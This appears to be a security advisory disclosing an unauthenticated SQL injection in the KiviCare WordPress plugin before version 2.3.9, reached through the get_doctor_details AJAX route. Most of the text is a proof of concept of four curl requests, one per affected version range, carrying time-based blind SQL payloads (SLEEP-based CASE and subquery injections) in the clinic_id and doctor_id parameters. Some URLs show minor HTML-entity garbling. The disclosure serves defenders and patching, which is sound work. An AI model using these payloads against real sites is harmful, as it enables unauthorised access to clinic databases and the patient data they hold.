KiviCare < 2.3.9 - Unauthenticated SQLi

The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users

PoC

With at least one doctor created via the plugin: v < 2.3.4 curl ‘https://example.com/wp-admin/admin-ajax.php?action=ajax_post&amp;route;_name=get_doctor_details&amp;clinic;_id[id]=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)’ --data ‘’ v < 2.3.5 curl ‘https://example.com/wp-admin/admin-ajax.php?action=ajax_get&amp;route;_name=get_doctor_details&amp;clinic;_id={“id”:“(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)”}’ v < 2.3.6 curl ‘https://example.com/wp-admin/admin-ajax.php?action=ajax_get&amp;route;_name=get_doctor_details&amp;clinic;_id={“id”:“1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)”}’ v <= 2.3.8 curl ‘http://example.com/wp-admin/admin-ajax.php?action=ajax_get&amp;route;_name=get_doctor_details&amp;clinic;_id={“id”:“1”}&amp;props;_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b’